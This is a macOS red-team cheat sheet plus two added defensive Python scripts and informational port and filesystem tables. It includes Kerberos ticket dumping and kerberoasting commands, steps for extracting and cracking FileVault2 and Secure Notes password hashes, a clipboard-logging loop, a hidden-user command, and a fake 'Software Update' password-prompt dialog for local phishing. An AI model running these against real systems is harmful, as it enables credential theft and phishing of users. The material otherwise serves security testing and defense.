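#!/usr/bin/env python3
"""Timeline the LaunchServices quarantine-event database.

Added example, not code from the Operator Handbook. Assumptions: the
LSQuarantineEvent column names used below, and that LSQuarantineTimeStamp
is a CoreFoundation absolute time (seconds since 2001-01-01 00:00:00 UTC).
The sample rows are constructed so the script runs without a Mac.
"""
import sqlite3
from datetime import datetime, timedelta, timezone

CF_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)
# Download types that commonly carry executable content; tune per environment.
RISKY_SUFFIXES = (".dmg", ".pkg", ".app", ".zip", ".command", ".sh")


def cf_absolute_to_utc(seconds):
    """Convert a CoreFoundation absolute time (float seconds) to an aware UTC datetime."""
    return CF_EPOCH + timedelta(seconds=float(seconds))


def load_quarantine_events(conn):
    """Return the events oldest-first with timestamps converted to UTC datetimes."""
    query = """
        SELECT LSQuarantineEventIdentifier, LSQuarantineTimeStamp,
               LSQuarantineAgentName, LSQuarantineAgentBundleIdentifier,
               LSQuarantineDataURLString, LSQuarantineOriginURLString,
               LSQuarantineSenderAddress
        FROM LSQuarantineEvent
        ORDER BY LSQuarantineTimeStamp
    """
    events = []
    for ident, ts, agent, bundle, data_url, origin, sender in conn.execute(query):
        events.append({
            "id": ident,
            "when": cf_absolute_to_utc(ts) if ts is not None else None,
            "agent": agent,
            "bundle": bundle,
            "data_url": data_url or "",
            "origin": origin or "",
            "sender": sender,
        })
    return events


def suspicious_downloads(events):
    """Events whose downloaded object is an archive or looks executable."""
    return [e for e in events
            if e["data_url"].lower().rstrip("/").endswith(RISKY_SUFFIXES)]


def build_sample_db():
    """In-memory database with the assumed schema and three constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""
        CREATE TABLE LSQuarantineEvent (
            LSQuarantineEventIdentifier TEXT PRIMARY KEY NOT NULL,
            LSQuarantineTimeStamp REAL,
            LSQuarantineAgentBundleIdentifier TEXT,
            LSQuarantineAgentName TEXT,
            LSQuarantineDataURLString TEXT,
            LSQuarantineSenderName TEXT,
            LSQuarantineSenderAddress TEXT,
            LSQuarantineTypeNumber INTEGER,
            LSQuarantineOriginTitle TEXT,
            LSQuarantineOriginURLString TEXT,
            LSQuarantineOriginAlias BLOB)""")
    rows = [  # constructed sample rows, not real telemetry
        ("A1", 600000000.0, "com.apple.Safari", "Safari",
         "https://example.com/files/report.pdf", None, None, 0, None,
         "https://example.com/reports", None),
        ("B2", 600003600.0, "com.apple.mail", "Mail",
         "file:///Users/analyst/Library/Mail%20Downloads/invoice.zip",
         "Accounts Payable", "ap@example.org", 2, None, None, None),
        ("C3", 599990000.0, "com.google.Chrome", "Google Chrome",
         "http://downloads.example.net/Installer.dmg", None, None, 0, None,
         "http://downloads.example.net/get", None),
    ]
    conn.executemany("INSERT INTO LSQuarantineEvent VALUES (?,?,?,?,?,?,?,?,?,?,?)", rows)
    conn.commit()
    return conn


if __name__ == "__main__":
    import sys
    conn = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db()
    events = load_quarantine_events(conn)
    flagged = {e["id"] for e in suspicious_downloads(events)}
    for e in events:
        mark = "!" if e["id"] in flagged else " "
        when = e["when"].strftime("%Y-%m-%d %H:%M:%S") if e["when"] else "?"
        print(f"{mark} {when} {e['agent']:<14} {e['data_url']}")
```

Work from a copy of the database: the live file may be locked by LaunchServices, and opening it in place changes access times on the evidence.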

MACOS_Exploit
RED TEAM EXPLOITATION MacOS

macOS SURVEY
SYSTEM_PROFILER Everything about your MacOS Setup
system_profiler > ~/Desktop/system_profile.txt

Show OS Build
sw_vers

Cat OS Build
cat /System/Library/CoreServices/[Link]

Show System Software Version


sw_vers -productVersion

Show CPU Brand String


sysctl -n [Link].brand_string

FileVault Status
fdesetup status

List All Hardware Ports


networksetup -listallhardwareports

Generate Advanced System and Performance Report


sudo sysdiagnose -f ~/Desktop/

Display Status of Loaded Kernel Extensions
sudo kextstat -l

Get Password Policy


pwpolicy getaccountpolicies

Enumerate Groups
groups

Cached Kerberos Tickets (if present)


klist
klist -c <cache>

Enrolled in MDM Solution


sudo /usr/bin/profiles status -type enrollment

LSREGISTER - Paths are searched for applications to register with the Launch Services database.
/System/Library/Frameworks/[Link]/Frameworks/Launch[Link]/Support/lsregister -dump

List all packages and apps install history


cat /Library/Receipts/[Link]
ls -lart /private/var/db/receipts/

List All Apps Downloaded from App Store


# Via Spotlight
mdfind kMDItemAppStoreHasReceipt=1

Show All Attached Disks and Partitions


diskutil list

Run a wireless network scan:
/System/Library/PrivateFrameworks/[Link]/Versions/Current/Resources/airport -s

Show Current SSID:
/System/Library/PrivateFrameworks/[Link]/Versions/Current/Resources/airport -I | awk '/ SSID/ {print substr($0, index($0, $2))}'

Show WiFi Connection History:
defaults read /Library/Preferences/SystemConfiguration/[Link]ces | grep LastConnected -A 7

Bluetooth Status
defaults read /Library/Preferences/[Link] ControllerPowerState

Show Memory Statistics
# One time
vm_stat
# Table of data, repeat 10 times total, 1 second wait between each poll
vm_stat -c 10 1

macOS ENUMERATION
DNS-SD ENUMERATION ON LOCAL NETWORK
Printer Services Example
#Browse local network for services:
dns-sd -B _services._dns-sd._udp local.
#Locate devices serving printer services:
dns-sd -B _ipp._tcp local.
#Lookup information about device:
dns-sd -L "Brother HL-L2350DW series" _ipp._tcp local.
#Lookup IP information about host:
dns-sd -G v4v6 [Link]
SMB Services Example
#Browse local network for services:
dns-sd -B _services._dns-sd._udp local.
#Locate devices serving SMB services:
dns-sd -B _smb._tcp local.
#Lookup information about device:
dns-sd -L "TimeCapsule" _smb._tcp local.
#Lookup IP information about host:
dns-sd -G v4v6 [Link]

IPPFIND Enumerate/Find Local Printers
#Locate printers on local network
ippfind
#Enumerate hostnames for printers
ippfind _ipp._tcp,_universal --exec echo '{service_hostname}' \;
#Advanced enumeration of printers info:
ippfind _ipp._tcp,_universal --exec dns-sd -G v4 '{service_hostname}' \;

Use Bonjour to locate other AFP services on network


dns-sd -B _afpovertcp._tcp

Active Directory Enumeration


dscl "/Active Directory/<domain>/All Domains" ls /Computers
dscl "/Active Directory/<domain>/All Domains" ls /Users

dscl "/Active Directory/<domain>/All Domains" read
/Users/<username>

Enumerate Basic Active Directory info for user


dscl . cat /Users/<username>

List Local Accounts with Admin rights


dscl . read /Groups/admin

Show domain info and admin AD groups


dsconfigad -show

Enumerate Users and Groups and Admins


dscl . list /Groups
dscl . list /Users
dscl . list /Users | grep -v '_'
dscacheutil -q group
dscacheutil -q group -a gid 80
dscacheutil -q user

List all profiles for user in Open Directory
dscl -u <ADMIN_USER> -P <PASS> <OD_Server> profilelist /LDAPv3/[Link]/Users/<USER>

BIFROST (Kerberos on macOS)
Goal of the project is to enable better security testing around
Kerberos on macOS devices using native APIs without requiring any
other framework or packages on the target.

LIST
Loop through all of the credential caches in memory and give basic
information about each cache and each entry within.
bifrost -action list

DUMP TICKETS
Iterate through the default credential cache.
bifrost -action dump -source tickets

DUMP KEYTABS
Attempt to dump information from the default keytab
(/etc/[Link]), which is only readable by root.
bifrost -action dump -source keytab

ASKHASH
Compute the necessary hashes used to request TGTs and decrypt
responses. This command requires the plaintext password; supply a
base64 encoded version of the password with -bpassword.
bifrost -action askhash -username lab_admin -domain [Link] -bpassword YWJjMTIzISEh

ASKTGT
Take a plaintext password, a hash, or a keytab entry and request a
TGT from the DC.
#With Base64 Password
bifrost -action asktgt -username lab_admin -domain [Link] -bpassword YWJjMTIzISEh
#With Hash
bifrost -action asktgt -username lab_admin -domain [Link] -enctype aes256 -hash 2DE49D76499F89DEA6DFA62D0EA7FEDFD108EC52936740E2450786A92616D1E1 -tgtEnctype rc4
#With Keytab
bifrost -action asktgt -username lab_admin -domain [Link] -enctype aes256 -keytab test

DESCRIBE
Command will parse out the information of a Kirbi file. You need to
supply -ticket [base64 of Kirbi ticket].
bifrost -action describe -ticket doIFIDCCBRygBgIEAA<...snip...>Uw=

ASKTGS
Command will ask the KDC for a service ticket based on a supplied
TGT. You need to supply -ticket [base64 of kirbi TGT] and -service
[spn,spn,spn].
bifrost -action asktgs -ticket doIFIDC<...snip...>Uw= -service cifs/[Link],host/[Link]

KERBEROASTING
If you want the service ticket to be rc4 and something more
crackable, specify -kerberoast true.
bifrost -action asktgs -ticket doIF<...snip...>QUw= -service host/[Link] -kerberoast true

PTT
Command takes a ticket (TGT or service ticket) and imports it to a
specified credential cache or creates a new credential cache.
bifrost -action ptt -cache new -ticket doI<...snip...>QUw=

REFERENCE:
[Link]
[Link]

Dylib Hijacking
By abusing various features and undocumented aspects of OS X's
dynamic loader, attackers need only to 'plant' specially crafted
dynamic libraries to have malicious code automatically loaded into
vulnerable applications.

REFERENCE:
[Link]
[Link]
[Link]
[Link]
20CON%2023%20-%[Link]
[Link]
[Link]
[Link]
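Both the "otool -L" step in the REVERSING MacOS MALWARE section and the Dylib Hijacking notes above come down to the same question for a defender: which load commands does a binary carry, and do any of them give the loader a reason to pick up a library from a location an attacker could write to? The parser below is an added example, not code from the Operator Handbook or from the referenced research. It assumes the Mach-O layout from Apple's <mach-o/loader.h> (a 32-byte mach_header_64 followed by ncmds load commands, where the dylib and rpath commands carry an lc_str offset to a NUL-terminated path) and flags the two conditions the hijacking research builds on: a weak import, which dyld tolerates being absent, and an @rpath import whose run-path list includes a non-system directory. The sample binary is constructed in build_sample_macho() and contains no code.

```python
#!/usr/bin/env python3
"""Walk a 64-bit Mach-O's load commands and flag dylib-hijack conditions.

Added example, not code from the Operator Handbook. Assumes the Mach-O
structures from <mach-o/loader.h>: mach_header_64 (32 bytes), then ncmds
load commands; LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, LC_REEXPORT_DYLIB and
LC_RPATH keep an lc_str offset right after the 8-byte command header.
"""
import struct

MH_MAGIC_64, MH_CIGAM_64 = 0xFEEDFACF, 0xCFFAEDFE
FAT_MAGIC, FAT_CIGAM = 0xCAFEBABE, 0xBEBAFECA
LC_LOAD_DYLIB = 0x0C
LC_LOAD_WEAK_DYLIB = 0x80000018
LC_RPATH = 0x8000001C
LC_REEXPORT_DYLIB = 0x8000001F
DYLIB_CMDS = {
    LC_LOAD_DYLIB: "LC_LOAD_DYLIB",
    LC_LOAD_WEAK_DYLIB: "LC_LOAD_WEAK_DYLIB",
    LC_REEXPORT_DYLIB: "LC_REEXPORT_DYLIB",
}
SYSTEM_PREFIXES = ("/usr/lib/", "/System/Library/")


def _cstring(data, start, end):
    """Decode the NUL-terminated string found in data[start:end]."""
    return data[start:end].split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_load_commands(data):
    """Return [(command_name, path)] for every dylib import and rpath entry."""
    (magic,) = struct.unpack_from("<I", data, 0)
    if magic in (FAT_MAGIC, FAT_CIGAM):
        raise ValueError("fat binary: extract one slice first (lipo -thin)")
    if magic == MH_MAGIC_64:
        end = "<"
    elif magic == MH_CIGAM_64:
        end = ">"
    else:
        raise ValueError(f"not a 64-bit Mach-O (magic {magic:#x})")
    ncmds, sizeofcmds = struct.unpack_from(end + "II", data, 16)
    offset, limit = 32, 32 + sizeofcmds
    entries = []
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from(end + "II", data, offset)
        if cmdsize < 8 or offset + cmdsize > min(limit, len(data)):
            raise ValueError("truncated or malformed load command")
        if cmd in DYLIB_CMDS or cmd == LC_RPATH:
            (str_off,) = struct.unpack_from(end + "I", data, offset + 8)
            name = DYLIB_CMDS.get(cmd, "LC_RPATH")
            entries.append((name, _cstring(data, offset + str_off, offset + cmdsize)))
        offset += cmdsize
    return entries


def hijack_candidates(entries):
    """Findings a defender would review before trusting the binary's imports."""
    rpaths = [p for k, p in entries if k == "LC_RPATH"]
    foreign_rpaths = [p for p in rpaths if not p.startswith(SYSTEM_PREFIXES)]
    findings = []
    for kind, path in entries:
        if kind == "LC_LOAD_WEAK_DYLIB":
            # dyld tolerates a missing weak dylib, so a file planted at this
            # path would be loaded without any error.
            findings.append(f"weak import: {path}")
        elif kind != "LC_RPATH" and path.startswith("@rpath/") and foreign_rpaths:
            # dyld tries each LC_RPATH directory in order; a writable one ahead
            # of the legitimate location lets a planted copy win.
            findings.append(f"@rpath import {path} searched in {foreign_rpaths}")
    return findings


def _lc(cmd, fmt, extra, path):
    """Pack one load command that carries a string, padded to 8 bytes."""
    head = struct.calcsize(fmt)
    payload = path.encode() + b"\0"
    payload += b"\0" * (-(head + len(payload)) % 8)
    return struct.pack(fmt, cmd, head + len(payload), head, *extra) + payload


def build_sample_macho():
    """Constructed arm64 executable header with four load commands and no code."""
    dylib_fmt, dylib_extra = "<IIIIII", (0, 0x10000, 0x10000)  # ts, cur, compat
    cmds = b"".join([
        _lc(LC_LOAD_DYLIB, dylib_fmt, dylib_extra, "/usr/lib/libSystem.B.dylib"),
        _lc(LC_LOAD_WEAK_DYLIB, dylib_fmt, dylib_extra, "/usr/local/lib/libHelper.dylib"),
        _lc(LC_RPATH, "<III", (), "@executable_path/../Frameworks"),
        _lc(LC_LOAD_DYLIB, dylib_fmt, dylib_extra, "@rpath/libPlugin.dylib"),
    ])
    # magic, cputype (arm64), cpusubtype, filetype MH_EXECUTE, ncmds, sizeofcmds, flags, reserved
    header = struct.pack("<IIIIIIII", MH_MAGIC_64, 0x0100000C, 0, 2, 4, len(cmds), 0, 0)
    return header + cmds


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_macho()
    found = parse_load_commands(blob)
    for kind, path in found:
        print(f"{kind:<20} {path}")
    for finding in hijack_candidates(found):
        print("REVIEW:", finding)
```

A finding is a reason to check the filesystem, not a verdict: confirm whether the weak dylib actually exists at its path and whether the non-system rpath directory is writable by a non-admin user before calling it exploitable.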

AIRSPY (AIRDROP EXPLORATION)


AirSpy is a tool for exploring Apple's AirDrop protocol
implementation on i/macOS, from the server's perspective. Dumps
requests and responses along with a linear code coverage trace of
the code processing each request.

REFERENCE:
[Link]
[Link]

Crack Apple Secure Notes
STEP 1: Copy sqlite 'NotesV#.storedata' from target located at:
/Users/<username>/Library/Containers/[Link]/Data/Library/Notes/
#Notes Version based on OS
Mountain Lion = [Link]
Mavericks = [Link]
Yosemite = [Link]
El Capitan & Sierra = [Link]
High Sierra = [Link]

STEP 2: Download John's 'applenotes2john' and point it at the sqlite database. Note this script also extracts the hints if present in the database and appends them to the end of the hash (Example 'company logo?'):
[Link]

[Link] NotesV#.storedata

NotesV#.storedata:$ASN$*4*20000*caff9d98b629cad13d54f5f3cbae2b85*79270514692c7a9d971a1ab6f6d22ba42c0514c29408[Link]ompany logo?

STEP 3: Format and load hash into John (--format=notes-opencl) or Hashcat (-m 16200) to crack.

Crack Apple FileVault2 Disk Encryption
STEP 1: Use dd to extract image of your FileVault2 encrypted disk:
sudo dd if=/dev/disk2 of=/path/to/filevault_image.dd conv=noerror,sync

STEP 2: Install fvde2john from [Link]

STEP 3: Use hdiutil to attach to dd image:
hdiutil attach -imagekey diskimage-class=CRawDiskImage -nomount /Volumes/path/to/filevault_image.dd

STEP 4: Obtain the [Link] from the "Recovery HD" partition
[Link]
encryptedrootplistwipekey
mmls /Volumes/path/to/filevault_image.dd
fls -r -o 50480752 /Volumes/path/to/filevault_image.dd | grep -i EncryptedRoot
+++++ r/r 130: [Link]

icat -o 50480752 [Link] 130 > [Link]

STEP 5: Verify and note the disk mount point for Apple_Corestorage:
diskutil list
…/dev/disk3s2 Apple_Corestorage

STEP 6: Use [Link] with fvdeinfo to retrieve the hash:
sudo fvdetools/fvdeinfo -e [Link] -p blahblah /dev/disk3s2
$fvde$1$16$96836044060108438487434858307513$41000$e9acbb4bc6dafb74aadb72c576fecf69c2ad45ccd4776d76

STEP 7: Load this hash into JTR or Hashcat to crack
john --format=FVDE-opencl --wordlist=[Link] [Link]
hashcat -a 0 -m 16700 [Link] [Link]

Crack Apple File System MacOS up to 10.13
STEP 1: Install apfs2john per the github instructions located at:
[Link]

STEP 2: Point 'apfs2john' at your device or disk image:
sudo ./bin/apfs-dump-quick /dev/sdc1 [Link]
sudo ./bin/apfs-dump-quick [Link] [Link]

!!Consider using 'kpartx' for handling disk images per Kholia recommendations: [Link]

macOS MISC
Dump Clipboard Contents Continuously
while true; do echo -e "\n$(pbpaste)" >>/tmp/[Link] && sleep 5; done

Add a hidden user on MacOS
sudo dscl . -create /Users/#{user_name} UniqueID 333

Extract All Certificates
security find-certificate -a -p

Locate Bookmark Database for Firefox & Chrome
#Write out to /tmp file:
find / -path "*/Firefox/Profiles/*/[Link]" -exec echo {} >> /tmp/[Link] \;
find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/[Link] \;

Locate Browser History: Safari, Chrome, Firefox
Parse browser history:
[Link]parser/tree/master/parse-browser-history
#Safari History
~/Library/Safari/[Link]
#Chrome History
~/Library/Application Support/Google/Chrome/Default/History
#Firefox History
~/Library/Application Support/Profiles<random>.default-release/[Link]

Prompt User for Password (Local Phishing)
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'

C2 TOOLS
PUPY
Pupy is a cross-platform, multi function RAT and post-exploitation
tool mainly written in python. It features an all-in-memory
execution guideline and leaves a very low footprint.

[Link]

APFELL
A cross-platform, post-exploit, red teaming framework built with
python3, docker, docker-compose, and a web browser UI. It's
designed to provide a collaborative and user friendly interface for
operators, managers, and reporting throughout mac and linux based
red teaming.
[Link]

MACOS_Hardening
BLUE TEAM CONFIGURATION MacOS

MacOS Hardening Guide
[Link]10.14/ERNW_Hardening_OS_X_Mojave.md

MACOS_Ports
ALL INFORMATIONAL MacOS
Historical OSX/macOS services and ports for all versions.

Port | Proto | App Proto | System Service Name
7 | TCP/UDP | echo | —
20 | TCP | ftp-data | —
21 | TCP | ftp | —
22 | TCP | ssh | Xcode Server (Git+SSH; SVN+SSH)
23 | TCP | telnet | —
25 | TCP | smtp | Mail
53 | TCP/UDP | domain | —
67 | UDP | bootps | NetBoot via DHCP
68 | UDP | bootpc | NetBoot via DHCP
69 | UDP | tftp | —
79 | TCP | finger | —
80 | TCP | http | World Wide Web
88 | TCP | kerberos | Kerberos, Screen Sharing authentication
106 | TCP | 3com-tsmux | macOS Server Password Server
110 | TCP | pop3 | Mail
111 | TCP/UDP | sunrpc | Portmap (sunrpc)
113 | TCP | ident | —
119 | TCP | nntp | Apps that read newsgroups
123 | UDP | ntp | Network time server synchronization
137 | UDP | netbios-ns | —
138 | UDP | netbios-dgm | Windows Datagram Service
139 | TCP | netbios-ssn | Microsoft Windows file and print services
143 | TCP | imap | Mail (receiving email)
161 | UDP | snmp | —
192 | UDP | osu-nms | AirPort Base Station PPP status or discovery, AirPort Admin Utility, AirPort Express Assistant
311 | TCP | asip-webadmin | Server app, Server Admin, Workgroup Manager, Server Monitor, Xsan Admin
312 | TCP | vslmp | Xsan Admin (OS X Mountain Lion v10.8 and later)
389 | TCP | ldap | Apps that look up addresses, such as Mail and Address Book
427 | TCP/UDP | svrloc | Network Browser
443 | TCP | https | TLS websites
445 | TCP | microsoft-ds | —
464 | TCP/UDP | kpasswd | —
465 | TCP | smtp (legacy) | Mail (sending mail)
500 | UDP | isakmp | macOS Server VPN service
500 | UDP | IKEv2 | Wi-Fi Calling
514 | TCP | shell | —
514 | UDP | syslog | —
515 | TCP | printer | Printing to a network printer, Printer Sharing in macOS
532 | TCP | netnews | —
548 | TCP | afpovertcp | AppleShare, Personal File Sharing, Apple File Service
554 | TCP/UDP | rtsp | AirPlay, QuickTime Streaming Server (QTSS), streaming media players
587 | TCP | submission | Mail (sending mail), iCloud Mail (SMTP authentication)
600–1023 | TCP/UDP | ipcserver | NetInfo
623 | UDP | asf-rmcp | Lights Out Monitoring (LOM)
625 | TCP | dec_dlm | Open Directory, Server app, Workgroup Manager; Directory Services in OS X Lion or earlier. This port is registered to DEC DLM
626 | TCP | asia | IMAP administration (Mac OS X Server v10.2.8 or earlier)
626 | UDP | asia | Server serial number registration (Xsan, Mac OS X Server v10.3 – v10.6)
631 | TCP | ipp | macOS Printer Sharing, printing to many common printers
636 | TCP | ldaps | Secure LDAP
660 | TCP | mac-srvr-admin | Server administration tools for Mac OS X Server v10.4 or earlier, including AppleShare IP
687 | TCP | asipregistry | Server administration tools for Mac OS X Server v10.6 or earlier, including AppleShare IP
749 | TCP/UDP | kerberos-adm | Kerberos 5
985 | TCP | — | NetInfo Static Port
993 | TCP | imaps | iCloud Mail (SSL IMAP)
995 | TCP/UDP | pop3s | Mail IMAP SSL
1085 | TCP/UDP | webobjects | —
1099, 8043 | TCP | rmiregistry | Remote RMI & IIOP JBOSS
1220 | TCP | qt-serveradmin | Administration of QuickTime Streaming Server
1640 | TCP | cert-responder | Profile Manager in macOS Server 5.2 and earlier
1649 | TCP | kermit | —
1701 | UDP | l2f | macOS Server VPN service
1723 | TCP | pptp | macOS Server VPN service
1900 | UDP | ssdp | Bonjour
2049 | TCP/UDP | nfsd | —
2195 | TCP | — | Push notifications
2196 | TCP | — | Feedback service
2197 | TCP | — | Push notifications
2336 | TCP | appleugcontrol | Home directory synchronization
3004 | TCP | csoftragent | —
3031 | TCP/UDP | eppc | Program Linking, Remote Apple Events
3283 | TCP/UDP | net-assistant | Apple Remote Desktop 2.0 or later (Reporting feature), Classroom app (command channel)
3284 | TCP/UDP | net-assistant | Classroom app (document sharing)
3306 | TCP | mysql | —
3478–3497 | UDP | nat-stun-port - ipether232port | FaceTime, Game Center
3632 | TCP | distcc | —
3659 | TCP/UDP | apple-sasl | macOS Server Password Server
3689 | TCP | daap | iTunes Music Sharing, AirPlay
3690 | TCP/UDP | svn | Xcode Server (anonymous remote SVN)
4111 | TCP | xgrid | —
4398 | UDP | — | Game Center
4488 | TCP | awacs-ice | —
4500 | UDP | ipsec-msft | macOS Server VPN service
4500 | UDP | IKEv2 | Wi-Fi Calling
5003 | TCP | fmpro-internal | —
5009 | TCP | winfs | AirPort Utility, AirPort Express Assistant
5100 | TCP | socalia | macOS camera and scanner sharing
5222 | TCP | jabber-client | Jabber messages
5223 | TCP | — | iCloud DAV Services, Push Notifications, FaceTime, iMessage, Game Center, Photo Stream
5228 | TCP | — | Spotlight Suggestions, Siri
5297 | TCP | — | Messages (local traffic)
5350 | UDP | — | Bonjour
5351 | UDP | nat-pmp | Bonjour
5353 | UDP | mdns | Bonjour, AirPlay, Home Sharing, Printer Discovery
5432 | TCP | postgresql | Can be enabled manually in OS X Lion Server (previously enabled by default for ARD 2.0 Database)
5897–5898 | UDP | — | xrdiags
5900 | TCP | vnc-server | Apple Remote Desktop 2.0 or later (Observe/Control feature); Screen Sharing (Mac OS X 10.5 or later)
5988 | TCP | wbem-http | Apple Remote Desktop 2.x. See also [Link]/standards/wbem.
6970–9999 | UDP | — | QuickTime Streaming Server
7070 | TCP | arcp | QuickTime Streaming Server (RTSP)
7070 | UDP | arcp | QuickTime Streaming Server
8000–8999 | TCP | irdmi | Web service, iTunes Radio streams
8005 | TCP | — | —
8008 | TCP | http-alt | Mac OS X Server v10.5 or later
8080 | TCP | http-alt | Also JBOSS HTTP in Mac OS X Server 10.4 or earlier
8085–8087 | TCP | — | Mac OS X Server v10.5 or later
8088 | TCP | radan-http | Mac OS X Server v10.4 or later
8089 | TCP | — | Mac OS X Server v10.6 or later
8096 | TCP | — | Mac OS X Server v10.6.3 or later
8170 | TCP | — | Podcast Capture/podcast CLI
8171 | TCP | — | Podcast Capture/podcast CLI
8175 | TCP | — | pcastagentd (such as for control operations and camera)
8443 | TCP | pcsync-https | Mac OS X Server v10.5 or later (JBOSS HTTPS in Mac OS X Server 10.4 or earlier)
8800 | TCP | sunwebadmin | Mac OS X Server v10.6 or later
8843 | TCP | — | Mac OS X Server v10.6 or later
8821, 8826 | TCP | — | Final Cut Server
8891 | TCP | — | Final Cut Server (data transfers)
9006 | TCP | — | Mac OS X Server v10.6 or earlier
9100 | TCP | — | Printing to certain network printers
9418 | TCP/UDP | git | Xcode Server (remote git)
10548 | TCP | serverdocs | macOS Server iOS file sharing
11211 | — | — | Calendar Server
16080 | TCP | — | Web service with performance cache
16384–16403 | UDP | — | Messages (Audio RTP, RTCP; Video RTP, RTCP)
16384–16387 | UDP | — | FaceTime, Game Center
16393–16402 | UDP | — | FaceTime, Game Center
16403–16472 | UDP | — | Game Center
24000–24999 | TCP | med-ltp | Web service with performance cache
42000–42999 | TCP | — | iTunes Radio streams
49152–65535 | TCP | — | Xsan Filesystem Access
49152–65535 | UDP | — | —
50003 | — | — | —
50006 | — | — | —

REFERENCE:
[Link]

MACOS_Structure
ALL INFORMATIONAL MacOS

DIRECTORY                        DESCRIPTION
/                                Root directory, present on virtually all UNIX-based
                                 file systems. Parent directory of all other files.
.DS_Store                        This Desktop Services Store file contains Finder
                                 settings, such as icon location, position of icons,
                                 choice of a background image, window size and the
                                 names of all files (and also directories) in that
                                 folder. The file will appear in any directory that
                                 you've viewed with the Finder and has functions
                                 similar to the file [Link] in Microsoft Windows.
.DocumentRevisions-V100/         DocumentRevisions-V100 is an internal version
                                 control system introduced by Apple in OS X Lion. A
                                 large database that saves a copy of a file, tracks
                                 changes, and lets you revert, every time you save
                                 it. Apple uses it for TextEdit, Keynote, Pages,
                                 Numbers, and some other programs. Developers can
                                 also interact with this API in their apps.
.fseventsd/                      The file system events daemon process writes file
                                 system event log files and is responsible for
                                 handling changes to the file system. This directory
                                 acts as a staging or buffer area for notifications
                                 to userspace processes.
.HFS+ Private Directory Data\r/  .HFS+ Private Directory Data\r and HFS+ Private
                                 Data are special folders used by the HFS+ filesystem
                                 to handle hard-linked folders and files,
                                 respectively. HFS+ doesn't support hard links, and
                                 UNIX, upon which macOS is based, requires them, so
                                 macOS developers simulated hard links: any file that
                                 has more than one link is moved into one of these
                                 invisible directories as an inode; the actual hard
                                 links are just aliases to the inode file with a
                                 special flag set in its metadata.
.PKInstallSandboxManager/        Used for software updates and the Sandbox
.PKInstallSandboxManager-SystemSoftware/
                                 Used for system software updates
.Spotlight-V100/                 Spotlight index data for searches
.Trashes/                        Trash folder, stored individually on each mounted
                                 volume; contains files that have been placed in
                                 Trash. On a boot volume, such files are stored in
                                 ~/.Trash. On a non-boot volume, these files are in
                                 /.Trashes/$UID/
.vol/                            A pseudo-directory used to access files by their ID
                                 or inode number; maps HFS+ file IDs to files. If you
                                 know a file's ID, you can open it using /.vol/ID
/Applications/                   Contains all Mac OS X applications
/bin/                            Essential common binaries and files/programs needed
                                 to boot the operating system.
/cores/                          Symbolic link to /private/cores. If core dumps are
                                 enabled they are created in this directory as
                                 [Link]
/dev/                            Files that represent various peripheral devices
                                 including keyboards, mice, trackpads
/etc/ -> /private/etc/           Symbolic link to /private/etc; contains machine-
                                 local system configuration and holds administrative,
                                 configuration, and other system files.
/home/                           All user files stored: documents, music, movies,
                                 pictures, downloads, etc. Every user has a home
                                 directory.
/Library/                        Shared libraries, settings, preferences, and other
                                 necessities [an additional Library folder in your
                                 home directory holds files specific to that user].
/net/                            Common default automounter local path is of the
                                 form /net/hostname/nfspath where hostname is the
                                 host name of the remote machine and nfspath is the
                                 path that is exported over NFS on the remote machine.
/Network/                        Location to attach network-wide resources and
                                 server volumes. In OS X 10.1, network resources are
                                 mounted in /private/Network with symbolic links. In
                                 OS X 10.3, various network resources (mainly
                                 servers) appear dynamically in /Network
/opt/                            Optional installations such as X11
/private/                        Where the tmp, var, etc, and cores directories of a
                                 typical Unix system are located.
/sbin/                           Contains executables for system administration and
                                 configuration
/System/                         Contains system-related files, libraries and
                                 preferences, critical for the proper function of
                                 Mac OS X
/tmp/                            Symbolic link to /private/tmp; holds temporary files
                                 and caches, which can be written by any user.
/User Information/ ->            PDF Manuals
  /Library/Documentation/User [Link]
/Users/                          All user accounts on the machine and their
                                 accompanying unique files, settings, etc.
/usr/                            Contains BSD Unix applications and support files.
                                 Includes subdirectories that contain information,
                                 configuration files, and other essentials used by
                                 the operating system
/var/                            Symbolic link to /private/var; contains
                                 miscellaneous data, configuration files and
                                 frequently modified files, such as log files.
/vm/                             Used to store the swap files for Mac OS X's virtual
                                 memory and the contents of RAM for sleep operations.
/Volumes/                        Mounted devices and volumes, either virtual or real:
                                 hard disks, CDs, DVDs, DMG mounts and the boot volume

REFERENCE:
[Link]
[Link]

MACOS_Tricks
ALL MISC MacOS

Generate Secure Password & Copy to Clipboard
LC_ALL=C tr -dc "[:alnum:]" < /dev/urandom | head -c 20 | pbcopy

Show External IP Address
# Method 1
dig +short [Link] @[Link]
# Method 2
curl -s [Link] && echo

Eject All Mountable Volumes
osascript -e 'tell application "Finder" to eject (every disk whose ejectable is true)'

Set Login Window Text
sudo defaults write /Library/Preferences/[Link] LoginwindowText "Your text"

Preview via QuickLook
qlmanage -p /path/to/file

Search via Spotlight
mdfind -name 'searchterm'

Show Spotlight Indexed Metadata
mdls /path/to/file

Speak Text with System Default Voice
say 'All your base are belong to us!'

Prevent Sleep for 1 Hour
caffeinate -u -t 3600

Generate UUID to Clipboard
uuidgen | tr -d '\n' | tr '[:upper:]' '[:lower:]' | pbcopy

Open Applications
open -a "Google Chrome" [Link]

MacOS Performance Monitoring with Powermetrics
powermetrics -a 0 -i 15000 -s tasks --show-process-io --show-process-energy -u /tmp/[Link]
# -a 0                   Don't display summary line
# -i 15000               Collect data every 15 seconds
# -s tasks               Focus on per-process information
# --show-process-io      Add disk I/O and pageins to results
# --show-process-energy  Show energy impact scores
# -u /tmp/[Link]         Output to file location

**Splunk regex for parsing powermetrics logs
index="your_index_here" sourcetype=generic_single_line
